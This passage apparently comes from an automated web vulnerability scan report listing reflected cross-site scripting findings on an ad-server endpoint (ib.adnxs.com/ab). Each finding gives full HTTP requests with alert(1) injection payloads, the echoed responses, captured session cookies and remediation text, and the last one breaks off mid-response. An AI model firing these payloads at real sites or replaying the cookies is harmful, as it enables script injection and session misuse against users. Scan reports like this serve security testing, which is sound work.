Cookie: __ar_v4=OZVXN65U6VG3BGSO7THUYQ%3A20110616%3A1%7CWRSB44J6LBBYHJ46YBYSXU%3A20110616%3A2%7C3FSLMUQHHZF3ZGSHGFBTCR%3A20110616%3A1%7CO5SUSHFLMFHUBPFB64PGTV%3A20110616%3A2%7CPM4V2RLCAZHMPP5I42UJOL%3A20110620%3A1%7CAG2H3EESGBBUTM6CFDP2IB%3A20110620%3A1; icu=ChIImdYCEAoYAiACKAIw2_f97wQQ2_f97wQYAQ..; sess=1; uuid2=3420415245200633085; anj=Kfw)lGMmHo)J710aOM'D:V]J6Pp<)XR:P9A_1GtV/vz(OLD7DZgAwKyX_on]pqLD1CqOxH$Ml[FPAxNm4*#mE1yof?:<P2)'y_Ao<sg.fk7N^#3(8CWJ9GnAJ+W=6D%XiU6y$<bQi#Ivn(dzO3_VQ9Pu+IPNjrPh1yV/7Nvftlu3>+p3Y8b27/-yPHqRz@kykkLb]NEEFBxn=Q`EPWMYJCTp[yzkrqGh9uF_][<ad7Yo5>9-IG$%Cijf/rMZZ63X2Z29I91RpdozSt%vGee5_4G4svy3A5A<6Ptw=)?7<(KzaliSLf2ROr.3[1Ioj%p=J#)G5pDF%R*x#>2IYfwPvKJib'jP<`8IB*1Vpr3m!*S@pJ_)Hc]Ex0vlm/7?-R8DdtE>W)NI$F:82CpO1=KYIk(aJc2l8'T1Lgxc2/7PW^[ZFy?V7[e(=%5kuoC<qS_/'IGhlBGHd2+xC0O?+C'VEUGC[Wa%UFR6kPO.u'RhxHqZ`!-tG<v^L.(>v_l*M+jJVr?$hn6gPKr@PbBPKuu[%>zRk=PStJf(uj^AblPf60IFUm/M0z([X'`0iCJ_VpKPMjM4bhud/[?=#WE6Dr^uR.xYMHgeUOc!vS#-Qtehe`3vFcZBb2b7<>dG^1)jm's<(Oawyc9gMJZvis#ZezCz*aYdLhc1f[wM(HINs>9Vrx5.Lt_zzrBJAGFX2q78am)yzU+hPO7v^<dpFaa@=w`p)@uXdrCnH)F

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 29-Jun-2011 01:31:56 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Mon, 26-Sep-2011 01:31:56 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Tue, 28 Jun 2011 01:31:56 GMT
Content-Length: 952

document.write('<iframe frameborder="0" width="300" height="250" marginheight="0" marginwidth="0" target="_blank" scrolling="no" src="http://ib.adnxs.com/if?enc=XLAFW7AF2z9SuB6F61HYPwAAAKCZmfk_dZMYBFY
...[SNIP]...
4%2C+1309224656%29%3B&cnd=!Ohz0wwiA2gEQmKIHGAAgvcgBMAE42j9AAEjWAlAAWABgVWgAcAB4AIABLIgB_qkBkAEBmAEBoAECqAEDsAEAuQEAAABQCtfbP8EBAAAAUArX2z_JATMzMzMzM_c_2QEAAAAAAADwP-ABAA..&ccd=!cwQeJAiA2gEQmKIHGL3IASAAe695b'-alert(1)-'e9d1fbe743&referrer=http://www.marketbuy54.com">
...[SNIP]...

1.295. http://ib.adnxs.com/ab [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c80a5'-alert(1)-'d54052d7109 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ab?enc=AAAAAAAABEAAAAAAAAABQAAAAKCZmfk_AAAAAAAAAUAAAAAAAAAEQBptQ40mDiQU_ayDGovBdy86LQlOAAAAAKNLAABlAQAAHgAAAAMAAABWsAYAPWQAAAEAAABVU0QAVVNEACwB-gDaHwMC4hABAgUCAQQAAAAA7xJF8QAAAAA.&tt_code=vert-4&click=http://va.px.invitemedia.com/pixel%3FreturnType=redirect%26key=Click%26message=eJwtizEOgEAIBL9iqC0OdoHTN13srIx_FxKrmcnCI4Ccmzm4bwIrj5yGrNIKUbpiDMeM0DiYDOnL3tJtZFe_WdF_snjda5VGKTnxfigAFGo-%26redirectURL=c80a5'-alert(1)-'d54052d7109&pixel=http://va.px.invitemedia.com/adnxs_imp%3FreturnType=image%26key=AdImp%26cost=$%7BPRICE_PAID%7D%26creativeID=122560%26message=eJwtizEOgEAIBL9iqC0OdoHTN13srIx_FxKrmcnCI4Ccmzm4bwIrj5yGrNIKUbpiDMeM0DiYDOnL3tJtZFe_WdF_snjda5VGKTnxfigAFGo-%26managed=false&referrer=http://www.marketbuy54.com&pp=AAABMNPYq_boi3H2_HXjM6JpDW6VdKM_EbbPGA&pubclick=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLyw0CMQwFwLf8FLRtcLXExk4cI9ECPdiKOdMhZWw7iLnPigXAbXSv3U2otgwSrU7hIRSh3N5s6WoFh9eVHiuO_xHiEdmZOIeSzmY0t540hOdWm_F9ZMEJ0GfBGcvuBRfg88UPs7KSfnMAAAA%3D%26dst%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __ar_v4=OZVXN65U6VG3BGSO7THUYQ%3A20110616%3A1%7CWRSB44J6LBBYHJ46YBYSXU%3A20110616%3A2%7C3FSLMUQHHZF3ZGSHGFBTCR%3A20110616%3A1%7CO5SUSHFLMFHUBPFB64PGTV%3A20110616%3A2%7CPM4V2RLCAZHMPP5I42UJOL%3A20110620%3A1%7CAG2H3EESGBBUTM6CFDP2IB%3A20110620%3A1; icu=ChIImdYCEAoYAiACKAIw2_f97wQQ2_f97wQYAQ..; anj=Kfw)lByDua)J710aN1uM:V]'Z(0`y4#l-BFQle>qp]zQUiHx0[BEjsd$'g86=07bR2*g'3v?@'bD.aPsUFEajB=KO4)pM`j$VTF>+pkzQ^3IPsI<lk^gkqZ@F8Yuukd[?gkR%^cB4W0q5^ja*+3hmh.t+mW(DG*.2M%.0)k?Ke`NSIcCsWE?KJ<b*#<.v+ohO/V`1by$3Y!1E^]yyWIxj@()uT]tMfQUG<$3iv#si)l-xjDw75TZ07W(fA$pR6%H[[$(6>j3UKOhM-p)pu+!DOjoM!nL)t+9ZRAbR8/cN+`H8J%^#9/4cIv@<OfXP0b@GPKaBr@uIp.OB?gEd*PhKu[z_bF]Kv%bQ7BrY8Lsu6r(C%`ds<u)nK0Y_7u`CfJtQ.crf6u@TAHr5p_Z82N7ec6IZNuPSRbpCo3/HFoSJ(Xn.teO3M478[g7JlkOXi*oRgMNz<lv>RT5owA6B[8p$kO`:B]wZNsZ+Z#hF1-(xo?v^hGmaiX'fWi4>]Q71dT-.^%]61b`qLEt9`cz'[V6=J*Nj$7QuKK9.bjg>Sx'mMww9V/<v8:?MgFb_^e3hI<tw1nIDy+8O3QdFy.APGblnw$N<S?y#Tb(<jEM7ITBpi<2nP0h?Z/RK5tM(r8Rm@Qcr!O'_g!nCd7551*IXx-17iNx`qIzv.wo_%m3G[/6V.)vG]^u's4@c3V; sess=1; uuid2=3420415245200633085

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 29-Jun-2011 01:24:48 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Mon, 26-Sep-2011 01:24:48 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: anj=Kfw)lByDua)J710aOM'D:VY6`(M#*5)x6%ZQle>qa64`.+4A]9_O:x@GNaZM`1JFR^VDro8xHjM7[*YFVacbRrQ8uzHfl>.NMiBdi:1kzgiJz?!zPFHhJRauW56._+VDu1!TCQ2lJGv)t#ojn[19t'sZi3F``BM_Bbc1wvmIOmZM'Ohb^M6MeYA[g4?*0zV/slIfURQb8n-*eIfUx?cGG@HFlwZ>E>HnVD)^mo_?4:ET=*m0Wy=MPhs3^lYzzwXtd<Y0*GepGmd9%2lle@TuuX1-P=oyWtwibj>=:SnkK@-+u^n#=ezmuN5%@h+QhFbC0``Tjply-NX/Dkn](TZ(#MCh)HJfpc1LWXfbrp-]Zd_(DYP65+d#d-u'eAnqm0Y6Sw<1M9w?aBE[0J6Wj$L^W<r$2uw/[R`b4bbU9[m^1Uaekdc<R9ax.Tcm@q5r8R2p[<se+b'jE'o#0]AgqwS[xCL`Y$/SgJ:!bGvLBX0O-xCn(>PrknO)8q$Y`h_ir>6nvR8R#F'athHx@c`M5K@t:nMYloUlA9Q$NIVcfB<T!E3-Kn*1Ho'NZF<='YC_KzAn!A(nZdU(VNz]@DBkQa/IbsYYme)AM9)w`)TaVWS8FqP0:[`4]Hb)ZE(OZIHhKy1K?w6VQb/v]U>^f!/8CmXVL6f$mEbq['ml'Kzw9RmI=G$xT1WO.rnOo?^-]hs!jK'/SJf-]7sR[owEhC(jK<P?`; path=/; expires=Mon, 26-Sep-2011 01:24:48 GMT; domain=.adnxs.com; HttpOnly
Date: Tue, 28 Jun 2011 01:24:48 GMT
Content-Length: 2567

function writeJS(doc){
var str='';
str += '<iframe src="http:\/\/view.atdmt.com\/COM\/iview\/328578506\/direct;wi.300;hi.250\/01?click=http://va.px.invitemedia.com/pixel%3FreturnType=redirect%26key=Click%26message=eJwtizEOgEAIBL9iqC0OdoHTN13srIx_FxKrmcnCI4Ccmzm4bwIrj5yGrNIKUbpiDMeM0DiYDOnL3tJtZFe_WdF_snjda5VGKTnxfigAFGo-%26redirectURL=c80a5'-alert(1)-'d54052d7109http%253A%252F%252Fbid.openx.net%252Fclick%253Fcd%253DH4sIAAAAAAAAABXLyw0CMQwFwLf8FLRtcLXExk4cI9ECPdiKOdMhZWw7iLnPigXAbXSv3U2otgwSrU7hIRSh3N5s6WoFh9eVHiuO_xHiEdmZOIeSzmY0t540hOdWm_F9ZMEJ0GfBGcvuBRfg88U
...[SNIP]...

1.296. http://ib.adnxs.com/ab [cnd parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The value of the cnd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6dae'-alert(1)-'8c063e1df71 was submitted in the cnd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ab?enc=VVbT9UQX_T_7ovPQLbr4PwAAAKCZmfk_-6Lz0C26-D9UVtP1RBf9P2tHbO389Xkl_ayDGovBdy-nLglOAAAAAKNLAABlAQAAPwMAACwAAACCrgIAPWQAAAEAAABVU0QAVVNEACwB-gDaHwMCgBEBAgUCAQQAAAAASyiRugAAAAA.&tt_code=vert-4&cnd=EAUaDE1ldGxpZmVfMjAxMSCfCijGCzDV0R46Gmh0dHA6Ly93d3cubWFya2V0YnV5NTQuY29tQgcI4rsKEPcBSgcI9p4CEJllUAFaKHRzZmttcmJCdjh5dmtPTE90WmVxbU9mRzVweXZtLVhQdDVGREYzNC1oG3V5fKQ9gAHWzr7gDJAB37UKoAEBqAGavAqwAQK6ARUzNDIwNDE1MjQ1MjAwNjMzMDg1OjDAAcX8bsgB-P34no0ma6dae'-alert(1)-'8c063e1df71&referrer=http://www.marketbuy54.com&custom_macro=QC_PIXEL_DATA%5EEAUaDE1ldGxpZmVfMjAxMSCfCijGCzDV0R46Gmh0dHA6Ly93d3cubWFya2V0YnV5NTQuY29tQgcI4rsKEPcBSgcI9p4CEJllUAFaKHRzZmttcmJCdjh5dmtPTE90WmVxbU9mRzVweXZtLVhQdDVGREYzNC1oG3V5fKQ9gAHWzr7gDJAB37UKoAEBqAGavAqwAQK6ARUzNDIwNDE1MjQ1MjAwNjMzMDg1OjDAAcX8bsgB-P34no0m%5ELOCAL_IP%5E63.251.90.151%5EQC_ACCOUNT%5Ep-800TOflix8dOQ%5EQC_RAND%5E31650&pp=AAABMNPeP6SqDSLySbsQOgIueNa0gWLQ3uB5fg&pubclick=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLzRECIQwG0G_9G5xtw2scWBICB1uwh7CEs11ZhmXYjuO7vxULgFsbJmVXIbXZiNkn9SRMUbcpwyzFXQMOz-v9veL4H52tdy-ZslclHdJopOJUOY-0ScuxesAJ0EfAGcvXAi7A64Mf8R560XMAAAA%3D%26dst%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __ar_v4=OZVXN65U6VG3BGSO7THUYQ%3A20110616%3A1%7CWRSB44J6LBBYHJ46YBYSXU%3A20110616%3A2%7C3FSLMUQHHZF3ZGSHGFBTCR%3A20110616%3A1%7CO5SUSHFLMFHUBPFB64PGTV%3A20110616%3A2%7CPM4V2RLCAZHMPP5I42UJOL%3A20110620%3A1%7CAG2H3EESGBBUTM6CFDP2IB%3A20110620%3A1; icu=ChIImdYCEAoYAiACKAIw2_f97wQQ2_f97wQYAQ..; sess=1; uuid2=3420415245200633085; anj=Kfw)lH.MX(*cOV4J%Z(eR29Ap(LySbQMwS2^iaSt_p$[-:TBnE@aC<#9*.nltI)XNNPwVx(%HnEP=5=>4*(jD:87VAtIqF29$`Km9D9>ZK)?2c%msp>pQGV5t>0g8sUVPSNJ34Q]czDMKoqe:4:5U4Ch9%kLuQluXvy%O+fUo8B)mrl#xz/YMev85nA8Mv)Ob/>XH*2FVGu'oM9S^1l)@Uf#Tro_v0H%q^t_6=+]4rtLD5+G3ieo(?lT[Wh^wVHs`!yw+'MW!G/ka7gEgz$=zLI2Zd:9#C0wwzC+0an6QT0to+x'=8Mma8u%vvE[ZiIoKZ4VbvQe[t'OmH#1TB%2%Y9(p0a56.t$%1?cH]wP<VSF^Ce5ElfAC>udbAO(m_6I?^8b#6#RpvlKg#2=?9HBu]AiUU`D]ZEXo9^(2I0Sw9_Xwk2)0XMBjJgfnV>DfPP2-ySke3KcYcEnJzhMLJuVEYkCun1*AoH@`^Q9m-<JCgl<!QWf64vzopnj(X6'_0NAfQ0<9Iry7l:a4mai[CcBGW>PY5#VlMu4iA0(D^.ix'R^?PRUE$2h_5-lr<*!2[0+c?IetVd%>]9PhKSrwP1BlM=+K:COp(zTP2eBeoaX6dGfi--9m+msYLOduGMpQql.4('Jzk<m)S4b+1>>H`/ZbyK@NT!y`Fmh_$QsF_#mBJAVS7rE>(%(BEQ_`32sk0FVJsRwVwKIdAmZ:!t:!db*%(hds6

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 29-Jun-2011 01:30:58 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Mon, 26-Sep-2011 01:30:58 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Tue, 28 Jun 2011 01:30:58 GMT
Content-Length: 1242

document.write('<iframe frameborder="0" width="300" height="250" marginheight="0" marginwidth="0" target="_blank" scrolling="no" src="http://ib.adnxs.com/if?enc=NJoAZ80z8j-LbOf7qfHuPwAAAKCZmfk_-6Lz0C2
...[SNIP]...
6Ly93d3cubWFya2V0YnV5NTQuY29tQgcI4rsKEPcBSgcI9p4CEJllUAFaKHRzZmttcmJCdjh5dmtPTE90WmVxbU9mRzVweXZtLVhQdDVGREYzNC1oG3V5fKQ9gAHWzr7gDJAB37UKoAEBqAGavAqwAQK6ARUzNDIwNDE1MjQ1MjAwNjMzMDg1OjDAAcX8bsgB-P34no0ma6dae'-alert(1)-'8c063e1df71&referrer=http://www.marketbuy54.com&custom_macro=QC_PIXEL_DATA%5EEAUaDE1ldGxpZmVfMjAxMSCfCijGCzDV0R46Gmh0dHA6Ly93d3cubWFya2V0YnV5NTQuY29tQgcI4rsKEPcBSgcI9p4CEJllUAFaKHRzZmttcmJCdjh5dmtPTE90WmVxbU9mRzV
...[SNIP]...

1.297. http://ib.adnxs.com/ab [custom_macro parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The value of the custom_macro request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f8d6'-alert(1)-'59c7ec1b78f was submitted in the custom_macro parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ab?enc=VVbT9UQX_T_7ovPQLbr4PwAAAKCZmfk_-6Lz0C26-D9UVtP1RBf9P2tHbO389Xkl_ayDGovBdy-nLglOAAAAAKNLAABlAQAAPwMAACwAAACCrgIAPWQAAAEAAABVU0QAVVNEACwB-gDaHwMCgBEBAgUCAQQAAAAASyiRugAAAAA.&tt_code=vert-4&cnd=EAUaDE1ldGxpZmVfMjAxMSCfCijGCzDV0R46Gmh0dHA6Ly93d3cubWFya2V0YnV5NTQuY29tQgcI4rsKEPcBSgcI9p4CEJllUAFaKHRzZmttcmJCdjh5dmtPTE90WmVxbU9mRzVweXZtLVhQdDVGREYzNC1oG3V5fKQ9gAHWzr7gDJAB37UKoAEBqAGavAqwAQK6ARUzNDIwNDE1MjQ1MjAwNjMzMDg1OjDAAcX8bsgB-P34no0m&referrer=http://www.marketbuy54.com&custom_macro=QC_PIXEL_DATA%5EEAUaDE1ldGxpZmVfMjAxMSCfCijGCzDV0R46Gmh0dHA6Ly93d3cubWFya2V0YnV5NTQuY29tQgcI4rsKEPcBSgcI9p4CEJllUAFaKHRzZmttcmJCdjh5dmtPTE90WmVxbU9mRzVweXZtLVhQdDVGREYzNC1oG3V5fKQ9gAHWzr7gDJAB37UKoAEBqAGavAqwAQK6ARUzNDIwNDE1MjQ1MjAwNjMzMDg1OjDAAcX8bsgB-P34no0m%5ELOCAL_IP%5E63.251.90.151%5EQC_ACCOUNT%5Ep-800TOflix8dOQ%5EQC_RAND%5E316507f8d6'-alert(1)-'59c7ec1b78f&pp=AAABMNPeP6SqDSLySbsQOgIueNa0gWLQ3uB5fg&pubclick=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLzRECIQwG0G_9G5xtw2scWBICB1uwh7CEs11ZhmXYjuO7vxULgFsbJmVXIbXZiNkn9SRMUbcpwyzFXQMOz-v9veL4H52tdy-ZslclHdJopOJUOY-0ScuxesAJ0EfAGcvXAi7A64Mf8R560XMAAAA%3D%26dst%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __ar_v4=OZVXN65U6VG3BGSO7THUYQ%3A20110616%3A1%7CWRSB44J6LBBYHJ46YBYSXU%3A20110616%3A2%7C3FSLMUQHHZF3ZGSHGFBTCR%3A20110616%3A1%7CO5SUSHFLMFHUBPFB64PGTV%3A20110616%3A2%7CPM4V2RLCAZHMPP5I42UJOL%3A20110620%3A1%7CAG2H3EESGBBUTM6CFDP2IB%3A20110620%3A1; icu=ChIImdYCEAoYAiACKAIw2_f97wQQ2_f97wQYAQ..; sess=1; uuid2=3420415245200633085; anj=Kfw)lH.MX(*cOV4J%Z(eR29Ap(LySbQMwS2^iaSt_p$[-:TBnE@aC<#9*.nltI)XNNPwVx(%HnEP=5=>4*(jD:87VAtIqF29$`Km9D9>ZK)?2c%msp>pQGV5t>0g8sUVPSNJ34Q]czDMKoqe:4:5U4Ch9%kLuQluXvy%O+fUo8B)mrl#xz/YMev85nA8Mv)Ob/>XH*2FVGu'oM9S^1l)@Uf#Tro_v0H%q^t_6=+]4rtLD5+G3ieo(?lT[Wh^wVHs`!yw+'MW!G/ka7gEgz$=zLI2Zd:9#C0wwzC+0an6QT0to+x'=8Mma8u%vvE[ZiIoKZ4VbvQe[t'OmH#1TB%2%Y9(p0a56.t$%1?cH]wP<VSF^Ce5ElfAC>udbAO(m_6I?^8b#6#RpvlKg#2=?9HBu]AiUU`D]ZEXo9^(2I0Sw9_Xwk2)0XMBjJgfnV>DfPP2-ySke3KcYcEnJzhMLJuVEYkCun1*AoH@`^Q9m-<JCgl<!QWf64vzopnj(X6'_0NAfQ0<9Iry7l:a4mai[CcBGW>PY5#VlMu4iA0(D^.ix'R^?PRUE$2h_5-lr<*!2[0+c?IetVd%>]9PhKSrwP1BlM=+K:COp(zTP2eBeoaX6dGfi--9m+msYLOduGMpQql.4('Jzk<m)S4b+1>>H`/ZbyK@NT!y`Fmh_$QsF_#mBJAVS7rE>(%(BEQ_`32sk0FVJsRwVwKIdAmZ:!t:!db*%(hds6

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 29-Jun-2011 01:31:06 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Mon, 26-Sep-2011 01:31:06 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Tue, 28 Jun 2011 01:31:06 GMT
Content-Length: 1242

document.write('<iframe frameborder="0" width="300" height="250" marginheight="0" marginwidth="0" target="_blank" scrolling="no" src="http://ib.adnxs.com/if?enc=NJoAZ80z8j-LbOf7qfHuPwAAAKCZmfk_-6Lz0C2
...[SNIP]...
PTE90WmVxbU9mRzVweXZtLVhQdDVGREYzNC1oG3V5fKQ9gAHWzr7gDJAB37UKoAEBqAGavAqwAQK6ARUzNDIwNDE1MjQ1MjAwNjMzMDg1OjDAAcX8bsgB-P34no0m%5ELOCAL_IP%5E63.251.90.151%5EQC_ACCOUNT%5Ep-800TOflix8dOQ%5EQC_RAND%5E316507f8d6'-alert(1)-'59c7ec1b78f">
...[SNIP]...

1.298. http://ib.adnxs.com/ab [pixel parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The value of the pixel request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6759'%3balert(1)//7760d9fdbab was submitted in the pixel parameter. This input was echoed as a6759';alert(1)//7760d9fdbab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ab?enc=AAAAAAAABEAAAAAAAAABQAAAAKCZmfk_AAAAAAAAAUAAAAAAAAAEQBptQ40mDiQU_ayDGovBdy86LQlOAAAAAKNLAABlAQAAHgAAAAMAAABWsAYAPWQAAAEAAABVU0QAVVNEACwB-gDaHwMC4hABAgUCAQQAAAAA7xJF8QAAAAA.&tt_code=vert-4&click=http://va.px.invitemedia.com/pixel%3FreturnType=redirect%26key=Click%26message=eJwtizEOgEAIBL9iqC0OdoHTN13srIx_FxKrmcnCI4Ccmzm4bwIrj5yGrNIKUbpiDMeM0DiYDOnL3tJtZFe_WdF_snjda5VGKTnxfigAFGo-%26redirectURL=&pixel=http://va.px.invitemedia.com/adnxs_imp%3FreturnType=image%26key=AdImp%26cost=$%7BPRICE_PAID%7D%26creativeID=122560%26message=eJwtizEOgEAIBL9iqC0OdoHTN13srIx_FxKrmcnCI4Ccmzm4bwIrj5yGrNIKUbpiDMeM0DiYDOnL3tJtZFe_WdF_snjda5VGKTnxfigAFGo-%26managed=falsea6759'%3balert(1)//7760d9fdbab&referrer=http://www.marketbuy54.com&pp=AAABMNPYq_boi3H2_HXjM6JpDW6VdKM_EbbPGA&pubclick=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLyw0CMQwFwLf8FLRtcLXExk4cI9ECPdiKOdMhZWw7iLnPigXAbXSv3U2otgwSrU7hIRSh3N5s6WoFh9eVHiuO_xHiEdmZOIeSzmY0t540hOdWm_F9ZMEJ0GfBGcvuBRfg88UPs7KSfnMAAAA%3D%26dst%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __ar_v4=OZVXN65U6VG3BGSO7THUYQ%3A20110616%3A1%7CWRSB44J6LBBYHJ46YBYSXU%3A20110616%3A2%7C3FSLMUQHHZF3ZGSHGFBTCR%3A20110616%3A1%7CO5SUSHFLMFHUBPFB64PGTV%3A20110616%3A2%7CPM4V2RLCAZHMPP5I42UJOL%3A20110620%3A1%7CAG2H3EESGBBUTM6CFDP2IB%3A20110620%3A1; icu=ChIImdYCEAoYAiACKAIw2_f97wQQ2_f97wQYAQ..; anj=Kfw)lByDua)J710aN1uM:V]'Z(0`y4#l-BFQle>qp]zQUiHx0[BEjsd$'g86=07bR2*g'3v?@'bD.aPsUFEajB=KO4)pM`j$VTF>+pkzQ^3IPsI<lk^gkqZ@F8Yuukd[?gkR%^cB4W0q5^ja*+3hmh.t+mW(DG*.2M%.0)k?Ke`NSIcCsWE?KJ<b*#<.v+ohO/V`1by$3Y!1E^]yyWIxj@()uT]tMfQUG<$3iv#si)l-xjDw75TZ07W(fA$pR6%H[[$(6>j3UKOhM-p)pu+!DOjoM!nL)t+9ZRAbR8/cN+`H8J%^#9/4cIv@<OfXP0b@GPKaBr@uIp.OB?gEd*PhKu[z_bF]Kv%bQ7BrY8Lsu6r(C%`ds<u)nK0Y_7u`CfJtQ.crf6u@TAHr5p_Z82N7ec6IZNuPSRbpCo3/HFoSJ(Xn.teO3M478[g7JlkOXi*oRgMNz<lv>RT5owA6B[8p$kO`:B]wZNsZ+Z#hF1-(xo?v^hGmaiX'fWi4>]Q71dT-.^%]61b`qLEt9`cz'[V6=J*Nj$7QuKK9.bjg>Sx'mMww9V/<v8:?MgFb_^e3hI<tw1nIDy+8O3QdFy.APGblnw$N<S?y#Tb(<jEM7ITBpi<2nP0h?Z/RK5tM(r8Rm@Qcr!O'_g!nCd7551*IXx-17iNx`qIzv.wo_%m3G[/6V.)vG]^u's4@c3V; sess=1; uuid2=3420415245200633085

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 29-Jun-2011 01:24:50 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Mon, 26-Sep-2011 01:24:50 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
